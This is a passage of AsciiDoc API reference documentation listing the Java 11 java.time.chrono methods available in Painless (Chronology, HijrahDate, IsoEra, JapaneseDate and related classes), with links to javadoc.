{java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* Chronology {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#getChronology()[getChronology]() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* ZoneOffset {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#getOffset()[getOffset]() -* ZoneId {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#getZone()[getZone]() -* int {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#isAfter(java.time.chrono.ChronoZonedDateTime)[isAfter](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#isBefore(java.time.chrono.ChronoZonedDateTime)[isBefore](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#isEqual(java.time.chrono.ChronoZonedDateTime)[isEqual](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* long {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toEpochSecond()[toEpochSecond]() -* Instant {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toInstant()[toInstant]() -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toLocalDate()[toLocalDate]() -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toLocalDateTime()[toLocalDateTime]() -* LocalTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toLocalTime()[toLocalTime]() -* null {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toString()[toString]() -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#withEarlierOffsetAtOverlap()[withEarlierOffsetAtOverlap]() -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#withLaterOffsetAtOverlap()[withLaterOffsetAtOverlap]() -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#withZoneSameInstant(java.time.ZoneId)[withZoneSameInstant](ZoneId) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#withZoneSameLocal(java.time.ZoneId)[withZoneSameLocal](ZoneId) - - -[[painless-api-reference-shared-Chronology]] -==== Chronology -* static Chronology {java11-javadoc}/java.base/java/time/chrono/Chronology.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static Set {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getAvailableChronologies()[getAvailableChronologies]() -* static Chronology {java11-javadoc}/java.base/java/time/chrono/Chronology.html#of(java.lang.String)[of](null) -* static Chronology {java11-javadoc}/java.base/java/time/chrono/Chronology.html#ofLocale(java.util.Locale)[ofLocale](Locale) -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#compareTo(java.time.chrono.Chronology)[compareTo](Chronology) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#date(java.time.temporal.TemporalAccessor)[date](TemporalAccessor) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#date(int,int,int)[date](int, int, int) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#date(java.time.chrono.Era,int,int,int)[date](Era, int, int, int) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#dateEpochDay(long)[dateEpochDay](long) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#dateYearDay(int,int)[dateYearDay](int, int) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#dateYearDay(java.time.chrono.Era,int,int)[dateYearDay](Era, int, int) -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#equals(java.lang.Object)[equals](Object) -* Era {java11-javadoc}/java.base/java/time/chrono/Chronology.html#eraOf(int)[eraOf](int) -* List {java11-javadoc}/java.base/java/time/chrono/Chronology.html#eras()[eras]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getCalendarType()[getCalendarType]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getId()[getId]() -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#isLeapYear(long)[isLeapYear](long) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#localDateTime(java.time.temporal.TemporalAccessor)[localDateTime](TemporalAccessor) -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/Chronology.html#period(int,int,int)[period](int, int, int) -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#prolepticYear(java.time.chrono.Era,int)[prolepticYear](Era, int) -* ValueRange {java11-javadoc}/java.base/java/time/chrono/Chronology.html#range(java.time.temporal.ChronoField)[range](ChronoField) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#resolveDate(java.util.Map,java.time.format.ResolverStyle)[resolveDate](Map, ResolverStyle) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#toString()[toString]() -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.temporal.TemporalAccessor)[zonedDateTime](TemporalAccessor) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.Instant,java.time.ZoneId)[zonedDateTime](Instant, ZoneId) - - -[[painless-api-reference-shared-Era]] -==== Era -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* null {java11-javadoc}/java.base/java/time/chrono/Era.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/Era.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-HijrahChronology]] -==== HijrahChronology -* static HijrahChronology {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#INSTANCE[INSTANCE] -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#compareTo(java.time.chrono.Chronology)[compareTo](Chronology) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#date(java.time.temporal.TemporalAccessor)[date](TemporalAccessor) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#date(int,int,int)[date](int, int, int) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#date(java.time.chrono.Era,int,int,int)[date](Era, int, int, int) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#dateEpochDay(long)[dateEpochDay](long) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#dateYearDay(int,int)[dateYearDay](int, int) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#dateYearDay(java.time.chrono.Era,int,int)[dateYearDay](Era, int, int) -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#equals(java.lang.Object)[equals](Object) -* HijrahEra {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#eraOf(int)[eraOf](int) -* List {java11-javadoc}/java.base/java/time/chrono/Chronology.html#eras()[eras]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getCalendarType()[getCalendarType]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getId()[getId]() -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#isLeapYear(long)[isLeapYear](long) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#localDateTime(java.time.temporal.TemporalAccessor)[localDateTime](TemporalAccessor) -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/Chronology.html#period(int,int,int)[period](int, int, int) -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#prolepticYear(java.time.chrono.Era,int)[prolepticYear](Era, int) -* ValueRange {java11-javadoc}/java.base/java/time/chrono/Chronology.html#range(java.time.temporal.ChronoField)[range](ChronoField) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#resolveDate(java.util.Map,java.time.format.ResolverStyle)[resolveDate](Map, ResolverStyle) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#toString()[toString]() -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.temporal.TemporalAccessor)[zonedDateTime](TemporalAccessor) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.Instant,java.time.ZoneId)[zonedDateTime](Instant, ZoneId) - - -[[painless-api-reference-shared-HijrahDate]] -==== HijrahDate -* static HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#of(int,int,int)[of](int, int, int) -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#atTime(java.time.LocalTime)[atTime](LocalTime) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#compareTo(java.time.chrono.ChronoLocalDate)[compareTo](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* HijrahChronology {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#getChronology()[getChronology]() -* HijrahEra {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#getEra()[getEra]() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isAfter(java.time.chrono.ChronoLocalDate)[isAfter](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isBefore(java.time.chrono.ChronoLocalDate)[isBefore](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isEqual(java.time.chrono.ChronoLocalDate)[isEqual](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isLeapYear()[isLeapYear]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#lengthOfMonth()[lengthOfMonth]() -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#lengthOfYear()[lengthOfYear]() -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* long {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#toEpochDay()[toEpochDay]() -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#toString()[toString]() -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#until(java.time.chrono.ChronoLocalDate)[until](ChronoLocalDate) -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#withVariant(java.time.chrono.HijrahChronology)[withVariant](HijrahChronology) - - -[[painless-api-reference-shared-HijrahEra]] -==== HijrahEra -* static HijrahEra {java11-javadoc}/java.base/java/time/chrono/HijrahEra.html#AH[AH] -* static HijrahEra {java11-javadoc}/java.base/java/time/chrono/HijrahEra.html#of(int)[of](int) -* static HijrahEra {java11-javadoc}/java.base/java/time/chrono/HijrahEra.html#valueOf(java.lang.String)[valueOf](null) -* static HijrahEra[] {java11-javadoc}/java.base/java/time/chrono/HijrahEra.html#values()[values]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* null {java11-javadoc}/java.base/java/time/chrono/Era.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/HijrahEra.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IsoChronology]] -==== IsoChronology -* static IsoChronology {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#INSTANCE[INSTANCE] -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#compareTo(java.time.chrono.Chronology)[compareTo](Chronology) -* LocalDate {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#date(java.time.temporal.TemporalAccessor)[date](TemporalAccessor) -* LocalDate {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#date(int,int,int)[date](int, int, int) -* LocalDate {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#date(java.time.chrono.Era,int,int,int)[date](Era, int, int, int) -* LocalDate {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#dateEpochDay(long)[dateEpochDay](long) -* LocalDate {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#dateYearDay(int,int)[dateYearDay](int, int) -* LocalDate {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#dateYearDay(java.time.chrono.Era,int,int)[dateYearDay](Era, int, int) -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#equals(java.lang.Object)[equals](Object) -* IsoEra {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#eraOf(int)[eraOf](int) -* List {java11-javadoc}/java.base/java/time/chrono/Chronology.html#eras()[eras]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getCalendarType()[getCalendarType]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getId()[getId]() -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#isLeapYear(long)[isLeapYear](long) -* LocalDateTime {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#localDateTime(java.time.temporal.TemporalAccessor)[localDateTime](TemporalAccessor) -* Period {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#period(int,int,int)[period](int, int, int) -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#prolepticYear(java.time.chrono.Era,int)[prolepticYear](Era, int) -* ValueRange {java11-javadoc}/java.base/java/time/chrono/Chronology.html#range(java.time.temporal.ChronoField)[range](ChronoField) -* LocalDate {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#resolveDate(java.util.Map,java.time.format.ResolverStyle)[resolveDate](Map, ResolverStyle) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#toString()[toString]() -* ZonedDateTime {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#zonedDateTime(java.time.temporal.TemporalAccessor)[zonedDateTime](TemporalAccessor) -* ZonedDateTime {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#zonedDateTime(java.time.Instant,java.time.ZoneId)[zonedDateTime](Instant, ZoneId) - - -[[painless-api-reference-shared-IsoEra]] -==== IsoEra -* static IsoEra {java11-javadoc}/java.base/java/time/chrono/IsoEra.html#BCE[BCE] -* static IsoEra {java11-javadoc}/java.base/java/time/chrono/IsoEra.html#CE[CE] -* static IsoEra {java11-javadoc}/java.base/java/time/chrono/IsoEra.html#of(int)[of](int) -* static IsoEra {java11-javadoc}/java.base/java/time/chrono/IsoEra.html#valueOf(java.lang.String)[valueOf](null) -* static IsoEra[] {java11-javadoc}/java.base/java/time/chrono/IsoEra.html#values()[values]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* null {java11-javadoc}/java.base/java/time/chrono/Era.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/IsoEra.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-JapaneseChronology]] -==== JapaneseChronology -* static JapaneseChronology {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#INSTANCE[INSTANCE] -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#compareTo(java.time.chrono.Chronology)[compareTo](Chronology) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#date(java.time.temporal.TemporalAccessor)[date](TemporalAccessor) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#date(int,int,int)[date](int, int, int) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#date(java.time.chrono.Era,int,int,int)[date](Era, int, int, int) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#dateEpochDay(long)[dateEpochDay](long) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#dateYearDay(int,int)[dateYearDay](int, int) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#dateYearDay(java.time.chrono.Era,int,int)[dateYearDay](Era, int, int) -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#equals(java.lang.Object)[equals](Object) -* JapaneseEra {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#eraOf(int)[eraOf](int) -* List {java11-javadoc}/java.base/java/time/chrono/Chronology.html#eras()[eras]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getCalendarType()[getCalendarType]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getId()[getId]() -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#isLeapYear(long)[isLeapYear](long) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#localDateTime(java.time.temporal.TemporalAccessor)[localDateTime](TemporalAccessor) -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/Chronology.html#period(int,int,int)[period](int, int, int) -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#prolepticYear(java.time.chrono.Era,int)[prolepticYear](Era, int) -* ValueRange {java11-javadoc}/java.base/java/time/chrono/Chronology.html#range(java.time.temporal.ChronoField)[range](ChronoField) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#resolveDate(java.util.Map,java.time.format.ResolverStyle)[resolveDate](Map, ResolverStyle) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#toString()[toString]() -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.temporal.TemporalAccessor)[zonedDateTime](TemporalAccessor) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.Instant,java.time.ZoneId)[zonedDateTime](Instant, ZoneId) - - -[[painless-api-reference-shared-JapaneseDate]] -==== JapaneseDate -* static JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#of(int,int,int)[of](int, int, int) -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#atTime(java.time.LocalTime)[atTime](LocalTime) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#compareTo(java.time.chrono.ChronoLocalDate)[compareTo](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* JapaneseChronology {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#getChronology()[getChronology]() -* JapaneseEra {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#getEra()[getEra]() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isAfter(java.time.chrono.ChronoLocalDate)[isAfter](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isBefore(java.time.chrono.ChronoLocalDate)[isBefore](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isEqual(java.time.chrono.ChronoLocalDate)[isEqual](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isLeapYear()[isLeapYear]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#lengthOfMonth()[lengthOfMonth]() -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#lengthOfYear()[lengthOfYear]() -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* long {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#toEpochDay()[toEpochDay]() -* null 